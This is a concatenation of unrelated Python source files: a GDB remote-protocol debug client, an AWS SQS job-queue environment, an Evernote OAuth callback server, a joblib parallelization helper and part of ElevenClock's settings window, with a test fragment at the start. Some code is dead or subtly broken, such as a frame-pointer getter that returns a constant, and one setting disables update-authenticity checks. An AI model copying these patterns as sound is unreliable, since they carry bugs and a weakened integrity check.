assert o1.getCounter() == 700
assert o2.getCounter() == 700
o1._destroy()
o2._destroy()
o3._destroy()
def test_filterParners():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[0]])
assert len(o1._SyncObj__otherNodes) == 1
# client.py
"""
Gdb debug client implementation for the debugger driver.
"""
import abc
import binascii
import logging
import struct
import string
import queue
from threading import Thread
from ..debug_driver import DebugDriver, DebugState
from .rsp import RspHandler
INTERRUPT = 2
BRKPOINT = 5
class GdbCommHandler(metaclass=abc.ABCMeta):
""" This class deals with the logic of communication """
def shake(self, message):
pass
class ThreadedCommHandler(GdbCommHandler):
""" A comm handler that uses a thread """
def __init__(self):
self.rxqueue = queue.Queue()
def send(self):
pass
def recv(self):
self.rxqueue.get()
# Idea: the gdb class should work threaded and non-threaded. How to do it?
# class AsyncCommHandler(GdbCommHandler):
# """ Communicate using asyncio """
# def __init__(self):
# self.event_loop = None
#
# def recv_loop(self):
# while True:
# data = await recv()
#
# def recv(self):
# if queue:
# pass
# else:
# yield to ioloop
class GdbDebugDriver(DebugDriver):
""" Implement debugging via the GDB remote interface.
GDB servers can communicate via the RSP protocol.
Helpfull resources:
http://www.embecosm.com/appnotes/ean4/
embecosm-howto-rsp-server-ean4-issue-2.html
- https://sourceware.org/gdb/onlinedocs/gdb/Stop-Reply-Packets.html
Tried to make this class about the protocol itself, not about the
sending and receiving of bytes. The protocol must be able to
work using sockets and threads, serial port and threads and asyncio
sockets.
"""
logger = logging.getLogger('gdbclient')
def __init__(self, arch, transport, pcresval=0, swbrkpt=False):
super().__init__()
self.arch = arch
self.transport = transport
self.status = DebugState.RUNNING
self.pcresval = pcresval
self._register_value_cache = {} # Cached map of register values
self.swbrkpt = swbrkpt
self.stopreason = INTERRUPT
self._message_handler = None
self._stop_msg_queue = queue.Queue()
self._msg_queue = queue.Queue(maxsize=1)
self._rsp = RspHandler(transport)
self._rsp.on_message = self._handle_message
def __str__(self):
return 'Gdb debug driver via {}'.format(self.transport)
def connect(self):
""" Connect to the target """
self._message_handler = Thread(target=self._handle_stop_queue)
self._message_handler.start()
self.transport.connect()
# self.send('?')
def disconnect(self):
""" Disconnect the client """
self.transport.disconnect()
self._stop_msg_queue.put(1337)
self._message_handler.join()
def _handle_stop_queue(self):
self.logger.debug('stop thread started')
msg = self._stop_msg_queue.get()
while msg != 1337:
self._process_stop_status(msg)
msg = self._stop_msg_queue.get()
self.logger.debug('stop thread finished')
def run(self):
""" start the device """
if self.status == DebugState.STOPPED:
self._prepare_continue()
else:
self.logger.warning('Already running!')
self._send_message("c")
self._start()
def restart(self):
""" restart the device """
if self.status == DebugState.STOPPED:
self.set_pc(self.pcresval)
self.run()
else:
self.logger.warning('Cannot restart, still running!')
def step(self):
""" Single step the device """
if self.status == DebugState.STOPPED:
self._prepare_continue()
self._send_message("s")
self._start()
else:
self.logger.warning('Cannot step, still running!')
def nstep(self, count):
""" Single step `count` times """
if self.status == DebugState.STOPPED:
self._prepare_continue()
self._send_message("n %x" % count)
self._start()
else:
self.logger.warning('Cannot step, still running!')
def _prepare_continue(self):
""" Set program counter somewhat back to continue """
if self.swbrkpt and self.stopreason is BRKPOINT:
pc = self.get_pc()
self.clear_breakpoint(pc - 4)
self.set_pc(pc - 4)
def stop(self):
if self.status == DebugState.RUNNING:
self._sendbrk()
else:
self.logger.warning('Cannot stop if not running')
def _sendbrk(self):
""" sends break command to the device """
self.logger.debug('Sending RAW stop 0x3')
self.transport.send(bytes([0x03]))
def _start(self):
""" Update state to started """
self.status = DebugState.RUNNING
self._register_value_cache.clear()
self.events.on_start()
def _stop(self):
self.status = DebugState.STOPPED
self.events.on_stop()
def _process_stop_status(self, pkt):
""" Process stopped status like these:
S05
T0500:00112233;
T05thread:01;
"""
assert pkt.startswith(('S', 'T'))
code = int(pkt[1:3], 16) # signal number
self.stopreason = code
if pkt.startswith('T'):
rest = pkt[3:]
for pair in map(str.strip, rest.split(';')):
if not pair:
continue
name, value = pair.split(':')
if is_hex(name):
# We are dealing with a register value here!
reg_num = int(name, 16)
#self.logger.error('%s', reg_num)
if reg_num == self.arch.gdb_registers.index(self.arch.gdb_pc):
# TODO: fill a cache of registers
data = bytes.fromhex(rest[3:-1])
self.pcstopval, = struct.unpack('<I', data)
if code & (BRKPOINT | INTERRUPT) != 0:
self.logger.debug("Target stopped..")
# If the program counter was not given in the stop packet
# retrieve it now
if self.arch.gdb_pc not in self._register_value_cache:
self.logger.debug('Retrieving general registers')
self._get_general_registers()
self._stop()
else:
self.logger.debug("Target running..")
self.status = DebugState.RUNNING
def get_status(self):
return self.status
def get_pc(self):
""" read the PC of the device """
if self.status == DebugState.STOPPED:
return self._get_register(self.arch.gdb_pc)
else:
return 0
def set_pc(self, value):
""" set the PC of the device """
self._set_register(self.arch.gdb_pc, value)
self.logger.debug("PC value set:%x", value)
def get_fp(self):
""" read the frame pointer """
return 0x100
fp = self._get_register(self.arch.fp)
self.logger.debug("FP value read:%x", fp)
return fp
def get_registers(self, registers):
if self.status == DebugState.STOPPED:
regs = self._get_general_registers()
else:
self.logger.warning('Cannot read registers while running')
regs = {}
return regs
def _get_general_registers(self):
""" Execute the gdb `g` command """
data = self._send_command("g")
data = binascii.a2b_hex(data.encode('ascii'))
res = {}
offset = 0
for register in self.arch.gdb_registers:
size = register.bitsize // 8
reg_data = data[offset:offset + size]
value = self._unpack_register(register, reg_data)
res[register] = value
# self.logger.debug('reg %s = %s', register, value)
self._register_value_cache[register] = value
offset += size
if len(data) != offset:
self.logger.error(
'Received %s bytes register data, processed %s',
len(data), offset)
return res
def set_registers(self, regvalues):
if self.status == DebugState.STOPPED:
data = bytearray()
res = {}
offset = 0
for register in self.arch.gdb_registers:
reg_data = self._pack_register(register, regvalues[register])
size = register.bitsize // 8
data[offset:offset + size] = reg_data
offset += size
data = binascii.b2a_hex(data).decode('ascii')
res = self._send_command("G %s" % data)
if res == 'OK':
self.logger.debug('Register written')
else:
self.logger.warning('Registers writing failed: %s', res)
def _get_register(self, register):
""" Get a single register """
if self.status == DebugState.STOPPED:
if register in self._register_value_cache:
value = self._register_value_cache[register]
else:
idx = self.arch.gdb_registers.index(register)
data = self._send_command("p %x" % idx)
data = binascii.a2b_hex(data.encode('ascii'))
value = self._unpack_register(register, data)
self._register_value_cache[register] = value
return value
else:
self.logger.warning(
'Cannot read register %s while not stopped', register)
return 0
def _set_register(self, register, value):
""" Set a single register """
if self.status == DebugState.STOPPED:
idx = self.arch.gdb_registers.index(register)
value = self._pack_register(register, value)
value = binascii.b2a_hex(value).decode('ascii')
res = self._send_command("P %x=%s" % (idx, value))
if res == 'OK':
self.logger.debug('Register written')
else:
self.logger.warning('Register write failed: %s', res)
def _unpack_register(self, register, data):
""" Fetch a register from some data """
fmts = {
8: '<Q',
4: '<I',
2: '<H',
1: '<B',
}
size = register.bitsize // 8
if len(data) == size:
if size == 3:
value = data[0] + (data[1] << 8) + (data[2] << 16)
else:
value, = struct.unpack(fmts[size], data)
else:
self.logger.error('Could not read register %s', register)
value = 0
return value
@staticmethod
def _pack_register(register, value):
""" Put some data in a register """
fmts = {
8: '<Q',
4: '<I',
2: '<H',
1: '<B',
}
size = register.bitsize // 8
data = struct.pack(fmts[size], value)
return data
def set_breakpoint(self, address: int):
""" Set a breakpoint """
if self.status == DebugState.STOPPED:
res = self._send_command("Z0,%x,4" % address)
if res == 'OK':
self.logger.debug('Breakpoint set')
else:
self.logger.warning('Breakpoint not set: %s', res)
else:
self.logger.warning('Cannot set breakpoint, target not stopped!')
def clear_breakpoint(self, address: int):
""" Clear a breakpoint """
if self.status == DebugState.STOPPED:
res = self._send_command("z0,%x,4" % address)
if res == 'OK':
self.logger.debug('Breakpoint cleared')
else:
self.logger.warning('Breakpoint not cleared: %s', res)
else:
self.logger.warning('Cannot clear breakpoint, target not stopped!')
def read_mem(self, address: int, size: int):
""" Read memory from address """
if self.status == DebugState.STOPPED:
res = self._send_command("m %x,%x" % (address, size))
ret = binascii.a2b_hex(res.encode('ascii'))
return ret
else:
self.logger.warning('Cannot read memory, target not stopped!')
return bytes()
def write_mem(self, address: int, data):
""" Write memory """
if self.status == DebugState.STOPPED:
length = len(data)
data = binascii.b2a_hex(data).decode('ascii')
res = self._send_command("M %x,%x:%s" % (address, length, data))
if res == 'OK':
self.logger.debug('Memory written')
else:
self.logger.warning('Memory write failed: %s', res)
else:
self.logger.warning('Cannot write memory, target not stopped!')
def _handle_message(self, message):
# Filter stop packets:
if message.startswith(('T', 'S')):
self._stop_msg_queue.put(message)
else:
self._msg_queue.put(message)
def _send_command(self, command):
""" Send a gdb command a receive a response """
self._send_message(command)
return self._recv_message()
def _recv_message(self, timeout=3):
""" Block until a packet is received """
return self._msg_queue.get(timeout=timeout)
def _send_message(self, message):
self._rsp.sendpkt(message)
def is_hex(text: str) -> bool:
""" Check if the given text is hexadecimal """
return all(c in string.hexdigits for c in text)
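# --- Editor's addition: a standalone sketch of how a GDB RSP stop-reply packet
# (the kind handled by _process_stop_status above) can be decoded. The sample
# packet and the 4-byte little-endian register width are illustrative assumptions,
# not data captured from a real target.
def _parse_stop_reply_sketch(pkt: str = "T0500:78563412;"):
    """ Return (signal, {reg_num: value}) for an 'S'/'T' stop-reply packet """
    signal = int(pkt[1:3], 16)  # e.g. 0x05 == SIGTRAP
    registers = {}
    for pair in pkt[3:].split(';'):
        if not pair or ':' not in pair:
            continue
        name, value = pair.split(':')
        if is_hex(name):
            # Register values travel as little-endian hex strings
            registers[int(name, 16)], = struct.unpack('<I', bytes.fromhex(value))
    return signal, registers  # -> (5, {0: 0x12345678}) for the default packet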
|
sqs_env.py
|
import logging
import multiprocessing
import warnings
import os
from typing import TYPE_CHECKING, Dict, Optional, Type, Union
import attr
import boto3
import requests
from sqs_workers import DEFAULT_BACKOFF, RawQueue, codecs, context, processors
from sqs_workers.core import RedrivePolicy
from sqs_workers.processors import DEFAULT_CONTEXT_VAR
from sqs_workers.queue import GenericQueue, JobQueue
from sqs_workers.shutdown_policies import NeverShutdown
if TYPE_CHECKING:
from sqs_workers.backoff_policies import BackoffPolicy
logger = logging.getLogger(__name__)
AnyQueue = Union[GenericQueue, JobQueue]
@attr.s
class SQSEnv(object):
session = attr.ib(default=boto3)
queue_prefix = attr.ib(default="")
# queue-specific settings
backoff_policy = attr.ib(default=DEFAULT_BACKOFF)
# jobqueue-specific settings
processor_maker = attr.ib(default=processors.Processor)
context_maker = attr.ib(default=context.SQSContext)
# internal attributes
context = attr.ib(default=None)
sqs_client = attr.ib(default=None)
sqs_resource = attr.ib(default=None)
queues = attr.ib(init=False, factory=dict) # type: Dict[str, AnyQueue]
def __attrs_post_init__(self):
if "AWS_DEFAULT_REGION" not in os.environ:
try:
os.environ["AWS_DEFAULT_REGION"] = (
requests.get("http://169.254.169.254/latest/dynamic/instance-identity/document", timeout=2).json().get("region")
)
            except requests.RequestException:
pass
self.context = self.context_maker()
self.sqs_client = self.session.client("sqs")
self.sqs_resource = self.session.resource("sqs")
def queue(
self,
queue_name, # type: str
queue_maker=JobQueue, # type: Type[AnyQueue]
backoff_policy=None, # type: Optional[BackoffPolicy]
):
        # type: (...) -> AnyQueue
"""
Get a queue object, initializing it with queue_maker if necessary.
"""
if queue_name not in self.queues:
backoff_policy = backoff_policy or self.backoff_policy
self.queues[queue_name] = queue_maker(env=self, name=queue_name, backoff_policy=backoff_policy)
return self.queues[queue_name]
def processor(self, queue_name, job_name, pass_context=False, context_var=DEFAULT_CONTEXT_VAR):
"""
Decorator to attach processor to all jobs "job_name" of the queue "queue_name".
"""
q = self.queue(queue_name, queue_maker=JobQueue) # type: JobQueue
return q.processor(job_name=job_name, pass_context=pass_context, context_var=context_var)
def raw_processor(self, queue_name):
"""
Decorator to attach raw processor to all jobs of the queue "queue_name".
"""
q = self.queue(queue_name, queue_maker=RawQueue) # type: RawQueue
return q.raw_processor()
def add_job(
self, queue_name, job_name, _content_type=codecs.DEFAULT_CONTENT_TYPE, _delay_seconds=None, _deduplication_id=None, _group_id=None, **job_kwargs
):
"""
Add job to the queue.
"""
warnings.warn(
"sqs.add_job() is deprecated. Use sqs.queue(...).add_job() instead", DeprecationWarning,
)
q = self.queue(queue_name, queue_maker=JobQueue) # type: JobQueue
return q.add_job(
job_name, _content_type=_content_type, _delay_seconds=_delay_seconds, _deduplication_id=_deduplication_id, _group_id=_group_id, **job_kwargs
)
def process_queues(self, queue_names=None, shutdown_policy_maker=NeverShutdown):
"""
        Use multiprocessing to process multiple queues at once. If queue names
        are not set, process all known queues.
        shutdown_policy_maker is an optional callable which takes no arguments
        and creates a new shutdown policy for each queue. It can look somewhat
        like this:
        lambda: IdleShutdown(idle_seconds=10)
"""
if not queue_names:
queue_names = self.get_all_known_queues()
processes = []
for queue_name in queue_names:
queue = self.queue(queue_name)
p = multiprocessing.Process(target=queue.process_queue, kwargs={"shutdown_policy": shutdown_policy_maker()},)
p.start()
processes.append(p)
for p in processes:
p.join()
def get_all_known_queues(self):
resp = self.sqs_client.list_queues(**{"QueueNamePrefix": self.queue_prefix})
if "QueueUrls" not in resp:
return []
urls = resp["QueueUrls"]
ret = []
for url in urls:
sqs_name = url.rsplit("/", 1)[-1]
queue_prefix_len = len(self.queue_prefix)
ret.append(sqs_name[queue_prefix_len:])
return ret
def get_sqs_queue_name(self, queue_name):
"""
Take "high-level" (user-visible) queue name and return SQS
("low level") name by simply prefixing it. Used to create namespaces
for different environments (development, staging, production, etc)
"""
return "{}{}".format(self.queue_prefix, queue_name)
def is_lambda_env(self):
return "LAMBDA_TASK_ROOT" in os.environ or "AWS_EXECUTION_ENV" in os.environ
def redrive_policy(self, dead_letter_queue_name, max_receive_count):
return RedrivePolicy(self, dead_letter_queue_name, max_receive_count)
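# --- Editor's addition: a minimal usage sketch of SQSEnv, not part of the original
# module. It assumes AWS credentials are configured and that a queue named
# "dev_emails" already exists; queue, job and argument names are placeholders.
if __name__ == "__main__":
    from sqs_workers.shutdown_policies import IdleShutdown
    sqs = SQSEnv(queue_prefix="dev_")

    @sqs.processor("emails", "send_email")
    def send_email(to, subject, body):
        # Receives the keyword arguments that were passed to add_job()
        print("Sending %r to %s" % (subject, to))

    # Enqueue one job, then drain the queue until it has been idle for 10 seconds
    sqs.queue("emails").add_job("send_email", to="user@example.com",
                                subject="Hello", body="Hi there!")
    sqs.process_queues(["emails"],
                       shutdown_policy_maker=lambda: IdleShutdown(idle_seconds=10))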
|
evernote_client_oauth.py
|
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qsl, quote, urlparse
import oauth2
from evernote_backup.cli_app_util import is_inside_docker
from evernote_backup.evernote_client import EvernoteClientBase
class OAuthDeclinedError(Exception):
"""Raise when user cancels authentication"""
class CallbackHandler(BaseHTTPRequestHandler):
http_codes = {
"OK": 200,
"NOT FOUND": 404,
}
def do_GET(self) -> None:
response = urlparse(self.path)
if response.path != "/oauth_callback":
self.send_response(self.http_codes["NOT FOUND"])
self.end_headers()
return
self.server.callback_response = dict(parse_qsl(response.query)) # type: ignore
self.send_response(self.http_codes["OK"])
self.end_headers()
self.wfile.write(
"<html><head><title>OAuth Callback</title></head>"
"<body>You can close this tab now...</body></html>".encode("utf-8")
)
def log_message(self, *args, **kwargs) -> None: # type: ignore
"""Silencing server log"""
class StoppableHTTPServer(HTTPServer):
def __init__(self, *args, **kwargs) -> None: # type: ignore
super().__init__(*args, **kwargs)
self.callback_response: dict = {}
def run(self) -> None:
try: # noqa: WPS501
self.serve_forever()
finally:
self.server_close()
class EvernoteOAuthCallbackHandler(object):
def __init__(self, oauth_client: "EvernoteOAuthClient", oauth_port: int) -> None:
self.client = oauth_client
self.server_host = "localhost"
self.server_port = oauth_port
self.oauth_token: dict = {}
def get_oauth_url(self) -> str:
self.oauth_token = self.client.get_request_token(
f"http://{self.server_host}:{self.server_port}/oauth_callback"
)
return self.client.get_authorize_url(self.oauth_token)
def wait_for_token(self) -> str:
callback = self._wait_for_callback()
if "oauth_verifier" not in callback:
raise OAuthDeclinedError
return self.client.get_access_token(
oauth_token=callback["oauth_token"],
oauth_verifier=callback["oauth_verifier"],
oauth_token_secret=self.oauth_token["oauth_token_secret"],
)
def _wait_for_callback(self) -> dict:
if is_inside_docker():
server_param = ("0.0.0.0", self.server_port) # noqa: S104
else:
server_param = (self.server_host, self.server_port)
callback_server = StoppableHTTPServer(server_param, CallbackHandler)
thread = threading.Thread(target=callback_server.run)
thread.start()
try: # noqa: WPS501
while not callback_server.callback_response:
time.sleep(0.1)
finally:
callback_server.shutdown()
thread.join()
return callback_server.callback_response
class EvernoteOAuthClient(EvernoteClientBase):
def __init__(
self,
backend: str,
consumer_key: str,
consumer_secret: str,
) -> None:
super().__init__(backend=backend)
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
def get_authorize_url(self, request_token: dict) -> str:
return "{0}?oauth_token={1}".format(
self._get_endpoint("OAuth.action"),
quote(request_token["oauth_token"]),
)
def get_request_token(self, callback_url: str) -> dict:
client = self._get_oauth_client()
request_url = "{0}?oauth_callback={1}".format(
self._get_endpoint("oauth"), quote(callback_url)
)
_, response_content = client.request(request_url, "GET")
return dict(parse_qsl(response_content.decode("utf-8")))
def get_access_token(
self,
oauth_token: str,
oauth_token_secret: str,
oauth_verifier: str,
) -> str:
token = oauth2.Token(oauth_token, oauth_token_secret)
token.set_verifier(oauth_verifier)
client = self._get_oauth_client(token)
_, response_content = client.request(self._get_endpoint("oauth"), "POST")
access_token_dict = dict(parse_qsl(response_content.decode("utf-8")))
return access_token_dict["oauth_token"]
def _get_oauth_client(self, token: Optional[oauth2.Token] = None) -> oauth2.Client:
consumer = oauth2.Consumer(self.consumer_key, self.consumer_secret)
return oauth2.Client(consumer, token) if token else oauth2.Client(consumer)
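# --- Editor's addition: a minimal sketch of the OAuth handshake using the classes
# above; not part of the original module. The backend name, consumer key/secret
# and callback port are placeholders that must be replaced with real values.
if __name__ == "__main__":
    client = EvernoteOAuthClient(
        backend="evernote",
        consumer_key="your-consumer-key",
        consumer_secret="your-consumer-secret",
    )
    oauth_handler = EvernoteOAuthCallbackHandler(client, oauth_port=10500)
    print("Open this URL in your browser and authorize the application:")
    print(oauth_handler.get_oauth_url())
    try:
        # Blocks until the local callback server receives the redirect
        access_token = oauth_handler.wait_for_token()
        print("Access token:", access_token)
    except OAuthDeclinedError:
        print("Authorization was declined.")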
|
_parallelize.py
|
# -*- coding: utf-8 -*-
"""Module used to parallelize model fitting."""
from typing import Any, Union, Callable, Optional, Sequence
from threading import Thread
from multiprocessing import Manager
import numpy as np
import joblib as jl
from cellrank.utils._utils import _get_n_cores
_msg_shown = False
def parallelize(
callback: Callable[[Any], Any],
collection: Sequence[Any],
n_jobs: Optional[int] = None,
n_split: Optional[int] = None,
unit: str = "",
as_array: bool = True,
use_ixs: bool = False,
backend: str = "multiprocessing",
extractor: Optional[Callable[[Any], Any]] = None,
show_progress_bar: bool = True,
) -> Union[np.ndarray, Any]:
"""
Parallelize function call over a collection of elements.
Params
------
callback
Function to parallelize.
collection
Sequence of items which to chunkify.
n_jobs
Number of parallel jobs.
n_split
Split :paramref:`collection` into :paramref:`n_split` chunks.
If `None`, split into :paramref:`n_jobs` chunks.
unit
Unit of the progress bar.
as_array
        Whether to convert the results into a :class:`numpy.ndarray`.
use_ixs
Whether to pass indices to the callback.
backend
Which backend to use for multiprocessing.
See :class:`joblib.Parallel` for valid options.
extractor
Function to apply to the result after all jobs have finished.
show_progress_bar
Whether to show a progress bar.
Returns
-------
    :class:`numpy.ndarray`
Result depending on :paramref:`extractor` and :paramref:`as_array`.
"""
if show_progress_bar:
try:
try:
from tqdm.notebook import tqdm
except ImportError:
from tqdm import tqdm_notebook as tqdm
import ipywidgets # noqa
except ImportError:
global _msg_shown
tqdm = None
if not _msg_shown:
print(
"Unable to create progress bar. Consider installing `tqdm` as `pip install tqdm` "
"and `ipywidgets` as `pip install ipywidgets`.\n"
"Optionally, you can disable the progress bar using `show_progress_bar=False`."
)
_msg_shown = True
else:
tqdm = None
def update(pbar, queue, n_total):
n_finished = 0
while n_finished < n_total:
if queue.get() is None:
n_finished += 1
elif pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
def wrapper(*args, **kwargs):
pbar = None if tqdm is None else tqdm(total=len(collection), unit=unit)
queue = Manager().Queue()
thread = Thread(target=update, args=(pbar, queue, len(collections)))
thread.start()
res = jl.Parallel(n_jobs=n_jobs, backend=backend)(
jl.delayed(callback)(
*((i, cs) if use_ixs else (cs,)), *args, **kwargs, queue=queue
)
for i, cs in enumerate(collections)
)
res = np.array(res) if as_array else res
thread.join()
return res if extractor is None else extractor(res)
n_jobs = _get_n_cores(n_jobs, len(collection))
if n_split is None:
n_split = n_jobs
collections = list(filter(len, np.array_split(collection, n_split)))
return wrapper
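# --- Editor's addition: a minimal usage sketch of ``parallelize``; not part of the
# original module. The callback is illustrative: it receives one chunk of the
# collection plus the ``queue`` keyword used for progress reporting (put a value
# per processed element and ``None`` once the whole chunk is done).
def _square_chunk(chunk, queue=None):
    result = [x ** 2 for x in chunk]
    if queue is not None:
        for _ in chunk:
            queue.put(1)  # one tick per element for the progress bar
        queue.put(None)  # signal that this worker finished its chunk
    return result
if __name__ == "__main__":
    squares = parallelize(
        _square_chunk,
        list(range(100)),
        n_jobs=2,
        as_array=False,
        show_progress_bar=False,
        extractor=lambda chunks: [x for chunk in chunks for x in chunk],
    )()  # parallelize() returns a wrapper that still has to be called
    print(squares[:5])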
|
settings.py
|
import glob
import platform
import subprocess
import os
import sys
import locale
import tempfile
import time
from urllib.request import urlopen
from PyQt5 import QtGui
from PyQt5 import QtCore
try:
import psutil
importedPsutil = True
except ImportError:
importedPsutil = False
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal as Signal
import globals
from win32mica import ApplyMica, MICAMODE
from languages import *
from tools import *
from tools import _
import welcome
import win32gui
from win32con import GWL_STYLE, WS_BORDER, WS_THICKFRAME, WS_CAPTION, WS_SYSMENU, WS_POPUP
from external.FramelessWindow import QFramelessWindow, QFramelessDialog
from external.blurwindow import ExtendFrameIntoClientArea, GlobalBlur
class SettingsWindow(QMainWindow):
def __init__(self):
super().__init__()
self.scrollArea = QScrollArea()
sp = QScrollerProperties()
sp.setScrollMetric( QScrollerProperties.DragVelocitySmoothingFactor, 1 )
sp.setScrollMetric( QScrollerProperties.ScrollingCurve, QEasingCurve.InOutCubic )
qs = QScroller.scroller( self.scrollArea )
qs.setScrollerProperties( sp )
self.vlayout = QVBoxLayout()
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setSpacing(0)
layout = QVBoxLayout()
self.updateSize = True
self.scrollArea.setWidgetResizable(True)
self.setObjectName("backgroundWindow")
self.scrollArea.setFrameShape(QFrame.NoFrame)
self.settingsWidget = QWidget()
self.settingsWidget.setObjectName("background")
self.setWindowIcon(QIcon(getPath("icon.ico")))
layout.addSpacing(0)
title = QLabel("\u200e"+_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW:
title.setStyleSheet("font-size: 20pt;font-family: \"Microsoft JhengHei UI\";font-weight: 600;")
elif lang == lang_zh_CN:
title.setStyleSheet("font-size: 20pt;font-family: \"Microsoft YaHei UI\";font-weight: 600;")
else:
title.setStyleSheet("font-size: 20pt;font-family: \"Segoe UI Variable Text\";font-weight: 600;")
layout.setSpacing(5)
layout.setContentsMargins(10, 0, 0, 0)
layout.addSpacing(0)
self.resize(900, 600)
self.setMinimumWidth(540)
if isWindowDark():
self.iconMode = "white"
else:
self.iconMode = "black"
self.announcements = QAnnouncements()
layout.addWidget(self.announcements)
self.updateButton = QSettingsButton(_("<b>Update to the latest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("")
self.updateButton.clicked.connect(lambda: KillableThread(target=globals.updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
self.generalSettingsTitle = QSettingsTitle(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"), _("Updates, icon tray, language"))
layout.addWidget(self.generalSettingsTitle)
        self.selectedLanguage = QSettingsComboBox(_("ElevenClock's language")+" (Language)", _("Change")) # The non-translated (Language) string is there to let people know what the language option is if you accidentally change the language
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
report(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
globals.app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
self.generalSettingsTitle.addWidget(self.selectedLanguage)
self.enableUpdates = QSettingsCheckBox(_("Automatically check for updates"))
self.enableUpdates.setChecked(not getSettings("DisableAutoCheckForUpdates"))
self.enableUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not bool(i), r = False))
self.generalSettingsTitle.addWidget(self.enableUpdates)
self.installUpdates = QSettingsCheckBox(_("Automatically install available updates"))
self.installUpdates.setChecked(not getSettings("DisableAutoInstallUpdates"))
self.installUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not bool(i), r = False))
self.generalSettingsTitle.addWidget(self.installUpdates)
self.silentUpdates = QSettingsCheckBox(_("Enable really silent updates"))
self.silentUpdates.setChecked(getSettings("EnableSilentUpdates"))
self.silentUpdates.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
self.generalSettingsTitle.addWidget(self.silentUpdates)
self.bypassCNAMECheck = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.bypassCNAMECheck.setChecked(getSettings("BypassDomainAuthCheck"))
self.bypassCNAMECheck.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
self.generalSettingsTitle.addWidget(self.bypassCNAMECheck)
self.enableSystemTray = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.enableSystemTray.setChecked(not getSettings("DisableSystemTray"))
self.enableSystemTray.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not bool(i)))
self.generalSettingsTitle.addWidget(self.enableSystemTray)
        self.disableTaskMgr = QSettingsCheckBox(_("Hide extended options from the clock right-click menu (needs a restart to be applied)"))
self.disableTaskMgr.setChecked(getSettings("HideTaskManagerButton"))
self.disableTaskMgr.stateChanged.connect(lambda i: setSettings("HideTaskManagerButton", bool(i)))
self.generalSettingsTitle.addWidget(self.disableTaskMgr)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
self.generalSettingsTitle.addWidget(self.startupButton)
        self.clockSettingsTitle = QSettingsTitle(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"), _("Fullscreen behaviour, clock position, 1st monitor clock, other miscellaneous settings"))
layout.addWidget(self.clockSettingsTitle)
self.legacyHideOnFullScreen = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.legacyHideOnFullScreen.setChecked(not getSettings("DisableHideOnFullScreen"))
self.legacyHideOnFullScreen.stateChanged.connect(lambda i: setSettings("DisableHideOnFullScreen", not bool(i)))
self.clockSettingsTitle.addWidget(self.legacyHideOnFullScreen)
self.newFullScreenHide = QSettingsCheckBox(_("Hide the clock when a program occupies all screens"))
self.newFullScreenHide.setChecked(getSettings("NewFullScreenMethod"))
self.newFullScreenHide.stateChanged.connect(lambda i: setSettings("NewFullScreenMethod", bool(i)))
self.clockSettingsTitle.addWidget(self.newFullScreenHide)
self.forceClockToShow = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.forceClockToShow.setChecked(getSettings("DisableHideWithTaskbar"))
self.forceClockToShow.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
self.clockSettingsTitle.addWidget(self.forceClockToShow)
self.showDesktopButton = QSettingsCheckBox(_("Add the \"Show Desktop\" button on the left corner of every clock"))
self.showDesktopButton.setChecked(getSettings("ShowDesktopButton"))
self.showDesktopButton.stateChanged.connect(lambda i: setSettings("ShowDesktopButton", bool(i)))
self.primaryScreen = QSettingsCheckBox(_("Show the clock on the primary screen"))
self.primaryScreen.setChecked(getSettings("ForceClockOnFirstMonitor"))
self.primaryScreen.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
self.clockSettingsTitle.addWidget(self.primaryScreen)
self.onlyPrimaryScreen = QSettingsCheckBox(_("Do not show the clock on secondary monitors"))
self.onlyPrimaryScreen.setChecked(getSettings("HideClockOnSecondaryMonitors"))
self.onlyPrimaryScreen.stateChanged.connect(lambda i: setSettings("HideClockOnSecondaryMonitors", bool(i)))
self.clockSettingsTitle.addWidget(self.onlyPrimaryScreen)
self.hideClockWhenClicked = QSettingsCheckBox(_("Hide the clock during 10 seconds when clicked"))
self.hideClockWhenClicked.setChecked(getSettings("HideClockWhenClicked"))
self.hideClockWhenClicked.stateChanged.connect(lambda i: setSettings("HideClockWhenClicked", bool(i)))
self.clockSettingsTitle.addWidget(self.hideClockWhenClicked)
